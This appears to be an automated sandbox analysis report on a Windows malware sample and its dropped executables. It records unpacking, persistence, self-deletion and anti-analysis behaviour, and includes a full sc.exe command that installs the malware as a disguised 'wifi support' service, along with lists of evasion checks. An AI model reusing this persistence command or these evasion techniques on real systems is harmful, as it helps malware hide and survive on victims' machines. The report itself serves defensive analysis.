                          Source: Binary string: wntdll.pdb source: WerFault.exe, 00000017.00000003.373965754.000000000310F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.375650861.000000000310F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: C:\teka.pdb source: 454.exe, 00000018.00000000.379254398.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: shcore.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: powrprof.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: fltLib.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: advapi32.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: shell32.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: q=C:\teka.pdb source: 454.exe, 00000018.00000000.379254398.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: C:\mimij 32_yowixeye-cepocud.pdb source: NNOKmCIVoi.exe, 00000000.00000000.247355043.0000000000413000.00000002.00020000.sdmp, NNOKmCIVoi.exe, 00000000.00000002.255140109.0000000000413000.00000002.00020000.sdmp, NNOKmCIVoi.exe, 00000001.00000000.253750901.0000000000413000.00000002.00020000.sdmp, eugcwgv, 00000012.00000000.350292520.0000000000413000.00000002.00020000.sdmp, eugcwgv, 00000012.00000002.364345797.0000000000413000.00000002.00020000.sdmp, eugcwgv, 00000013.00000000.358288557.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: wimm32.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: sechost.pdbk source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: C:\fav.pdb source: 12CC.exe, 00000019.00000000.390461796.0000000000413000.00000002.00020000.sdmp, 12CC.exe, 00000019.00000002.420476884.0000000000415000.00000002.00020000.sdmp, qflfaqod.exe, 00000029.00000002.430175113.0000000000415000.00000002.00020000.sdmp, qflfaqod.exe, 00000029.00000000.420866435.0000000000413000.00000002.00020000.sdmp
                          Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000017.00000003.380571718.0000000005340000.00000004.00000040.sdmp
                          Source: Binary string: combase.pdb source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000017.00000003.373977412.0000000003115000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.374942488.0000000003115000.00000004.00000001.sdmp
                          Source: Binary string: shcore.pdb&< source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: apphelp.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: wuser32.pdb source: WerFault.exe, 00000017.00000003.380556555.00000000051C1000.00000004.00000001.sdmp
                          Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 3412.exe, 00000014.00000000.368430619.0000000000413000.00000002.00020000.sdmp, 3412.exe, 00000014.00000000.359444132.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000017.00000002.423473511.00000000052B0000.00000002.00020000.sdmp
                          Source: Binary string: combase.pdbB< source: WerFault.exe, 00000017.00000003.380583817.0000000005346000.00000004.00000040.sdmp
                          Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000017.00000003.373965754.000000000310F000.00000004.00000001.sdmp, WerFault.exe, 00000017.00000003.375650861.000000000310F000.00000004.00000001.sdmp

                          Data Obfuscation:

                          barindex
                          Detected unpacking (overwrites its own PE header)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\454.exeUnpacked PE file: 24.2.454.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeUnpacked PE file: 25.2.12CC.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeUnpacked PE file: 41.2.qflfaqod.exe.400000.0.unpack
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeUnpacked PE file: 41.2.qflfaqod.exe.400000.0.unpack
                          Detected unpacking (changes PE section rights)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\454.exeUnpacked PE file: 24.2.454.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeUnpacked PE file: 25.2.12CC.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeUnpacked PE file: 41.2.qflfaqod.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                          .NET source code contains method to dynamically call methods (often used by packers)Show sources
                          Source: 2655.exe.6.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 26.0.2655.exe.f80000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 26.0.2655.exe.f80000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 26.0.2655.exe.f80000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: 26.2.2655.exe.f80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00403523 push ecx; ret
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00412604 push eax; ret
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00405785 push ecx; ret
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00463C66 push esi; ret
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00463C01 push esi; ret
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_00473634 push es; iretd
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_00401880 push esi; iretd
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_2_00402E94 push es; iretd
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 1_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_00401880 push esi; iretd
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_2_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Roaming\eugcwgvCode function: 19_1_00402E94 push es; iretd
                          Source: C:\Users\user\AppData\Local\Temp\3412.exeCode function: 20_2_00412CA4 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_004139B0 push eax; ret
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_005F3A79 push 0000002Bh; iretd
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_005F1283 push ds; ret
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_00F88508 push 00000028h; retf 0000h
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_00F8764A push esp; ret
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_03254003 push esi; retf
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_032E1868 push ss; iretd
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeCode function: 26_2_032E9C63 push E8FFFFFFh; retf
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeCode function: 41_2_00D31283 push ds; ret
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeCode function: 41_2_00D33A79 push 0000002Bh; iretd
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeCode function: 0_2_0040B46D LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                          Source: C71D.exe.6.drStatic PE information: 0xA029C1CD [Wed Feb 24 14:12:29 2055 UTC]
                          Source: BD87.exe.6.drStatic PE information: section name: .7m512qw
                          Source: D78A.exe.6.drStatic PE information: section name:
                          Source: D78A.exe.6.drStatic PE information: section name:
                          Source: D78A.exe.6.drStatic PE information: section name:
                          Source: D78A.exe.6.drStatic PE information: section name:
                          Source: D78A.exe.6.drStatic PE information: section name:
                          Source: D78A.exe.6.drStatic PE information: section name:
                          Source: D78A.exe.6.drStatic PE information: section name: .x3Kvu4C
                          Source: D78A.exe.6.drStatic PE information: section name: .adata
                          Source: E3A0.exe.6.drStatic PE information: section name: .didata
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .edata
                          Source: 2655.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                          Source: D78A.exe.6.drStatic PE information: real checksum: 0x3813f7 should be: 0x3880b6
                          Source: initial sampleStatic PE information: section name: .edata entropy: 7.99737439266
                          Source: initial sampleStatic PE information: section name: entropy: 7.99712750395
                          Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.23664755416
                          Source: initial sampleStatic PE information: section name: .x3Kvu4C entropy: 7.9180801427
                          Source: initial sampleStatic PE information: section name: .didata entropy: 7.99657166712
                          Source: 2655.exe.6.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 2655.exe.6.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 26.0.2655.exe.f80000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 26.0.2655.exe.f80000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 26.0.2655.exe.f80000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 26.0.2655.exe.f80000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 26.0.2655.exe.f80000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 26.0.2655.exe.f80000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 26.2.2655.exe.f80000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 26.2.2655.exe.f80000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                          Persistence and Installation Behavior:

                          barindex
                          Drops executables to the windows directory (C:\Windows) and starts themShow sources
                          Source: unknownExecutable created and started: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\eugcwgvJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D78A.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\eugcwgvJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\454.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\12CC.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\E3A0.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8F03.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3412.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A7DB.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C71D.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe (copy)Jump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeFile created: C:\Users\user\AppData\Local\Temp\qflfaqod.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BD87.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2655.exeJump to dropped file
                          Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe (copy)Jump to dropped file
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create hdysgoc binPath= "C:\Windows\SysWOW64\hdysgoc\qflfaqod.exe /d\"C:\Users\user\AppData\Local\Temp\12CC.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeCode function: 25_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          Hooking and other Techniques for Hiding and Protection:

                          barindex
                          Deletes itself after installationShow sources
                          Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\nnokmcivoi.exeJump to behavior
                          Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                          Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\eugcwgv:Zone.Identifier read attributes | delete
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\2655.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeProcess information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeProcess information set: NOGPFAULTERRORBOX

                          Malware Analysis System Evasion:

                          barindex
                          Found evasive API chain (may stop execution after checking mutex)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\454.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                          Source: eugcwgv, 00000013.00000002.376562756.000000000045B000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
                          Source: NNOKmCIVoi.exe, 00000001.00000002.319555960.0000000001F60000.00000004.00000001.sdmpBinary or memory string: ASWHOOKH.
                          Found evasive API chain (may stop execution after checking locale)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\454.exeEvasive API call chain: GetUserDefaultLangID, ExitProcess
                          Checks if the current machine is a virtual machine (disk enumeration)Show sources
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\Desktop\NNOKmCIVoi.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\eugcwgvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\eugcwgvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\eugcwgvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\eugcwgvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\eugcwgvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\eugcwgvKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\454.exeEvasive API call chain: GetPEB, DecisionNodes, Sleep
                          Source: C:\Users\user\AppData\Local\Temp\454.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                          Contains functionality to detect sleep reduction / modificationsShow sources
                          Source: C:\Users\user\AppData\Local\Temp\454.exeCode function: 24_2_00406AA0
                          Found evasive API chain (may stop execution after checking computer name)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\454.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
                          Source: C:\Windows\SysWOW64\hdysgoc\qflfaqod.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                          Source: C:\Users\user\AppData\Local\Temp\12CC.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
                          Source: C:\Windows\System32\svchost.exe TID: 6480Thread sleep time: -30000s >= -30000s
